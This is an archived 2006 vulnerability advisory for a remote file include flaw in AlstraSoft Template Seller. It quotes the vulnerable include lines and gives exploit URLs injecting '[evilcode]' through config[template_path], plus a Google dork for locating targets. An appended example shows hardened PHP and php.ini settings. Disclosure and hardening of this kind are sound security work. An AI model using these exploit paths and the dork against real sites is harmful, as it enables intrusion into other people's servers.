Computer Security
[EN] securityvulns.ru

From: jong_amq_(at)_hotmail.com <jong_amq_(at)_hotmail.com>
Date: 06.09.2006
Subject: SolpotCrew Advisory #7 - AlstraSoft Template Seller Remote File Include Vulnerability

#############################SolpotCrew Community################################
#
#        AlstraSoft Template Seller Remote File Include Vulnerability
#
#        Download file : http://www.alstrasoft.com/template.htm
#
#################################################################################

#
#
#       Bug Found By : NoGe a.k.a da_jackass
#
#       contact: jong_amq@hotmail.com
#
#       Website : http://nyubicrew.org/adv/Noge_adv_01.txt
#
################################################################################

#
#
#      Greetz: skulmatic[thanks for sharing knowledge] h4ntu[for the video] olibekas solpotcrew PremanMedan
#              yooogy[pa bozz] siwa^lima sagu mousekill ilalang13
#              #papmahackerlink #nyubi #maluku-hacker #papuahacker
#              
###############################################################################
# Vulnerability found in

payment_result.php and spuser_result.php

line 6 include("$config[template_path]/onlyheader.php");
line 7 include("$config[template_path]/onlysearch.php");


# Exploit

/payment/payment_result.php?config[template_path]=[evilcode]

/payment/spuser_result.php?config[template_path]=[evilcode]


# google dork

"Powered by AlstraSoft Template Seller"

######################################E.O.F##################################
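
Added example (not part of the advisory and not AlstraSoft code): a hardened form of the two include() lines quoted above, in which the template directory is assigned by the application itself and checked to be a local directory inside the application root before anything is included. The function name template_includes(), the demo directory layout and the sample values are hypothetical and constructed for illustration; it assumes the original scripts reach line 6 without assigning $config themselves, so that the request parameter ends up in the include path.

```php
<?php
// Added example, not AlstraSoft code. Function name and directory layout are hypothetical.

// Return the two template files to include, or throw if $templatePath is not
// a local directory inside $appRoot.
function template_includes(string $templatePath, string $appRoot): array
{
    $root = realpath($appRoot);
    $dir  = realpath($templatePath);   // false for URLs and nonexistent paths
    if ($root === false || $dir === false || !is_dir($dir)) {
        throw new RuntimeException('template path is not a local directory');
    }
    if (strncmp($dir . DIRECTORY_SEPARATOR, $root . DIRECTORY_SEPARATOR, strlen($root) + 1) !== 0) {
        throw new RuntimeException('template path is outside the application root');
    }
    $files = [];
    foreach (['onlyheader.php', 'onlysearch.php'] as $name) {
        $file = $dir . DIRECTORY_SEPARATOR . $name;
        if (!is_file($file)) {
            throw new RuntimeException("missing template: $name");
        }
        $files[] = $file;
    }
    return $files;
}

// Constructed sample layout so the example runs offline.
$appRoot = sys_get_temp_dir() . '/tplseller_demo_' . getmypid();
mkdir("$appRoot/templates", 0700, true);
file_put_contents("$appRoot/templates/onlyheader.php", "header\n");
file_put_contents("$appRoot/templates/onlysearch.php", "search\n");

// Set by the application itself before any include, never taken from $_GET/$_POST.
$config = ['template_path' => "$appRoot/templates"];

foreach (template_includes($config['template_path'], $appRoot) as $file) {
    include $file;
}

// Values of the kind a request could supply are rejected (constructed inputs).
foreach (['http://remote.invalid/x', "$appRoot/templates/../.."] as $bad) {
    try {
        template_includes($bad, $appRoot);
    } catch (RuntimeException $e) {
        echo "rejected: ", $e->getMessage(), "\n";
    }
}
```

Setting register_globals and allow_url_include to Off in php.ini removes the two PHP behaviours this class of bug depends on, independently of the code fix.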
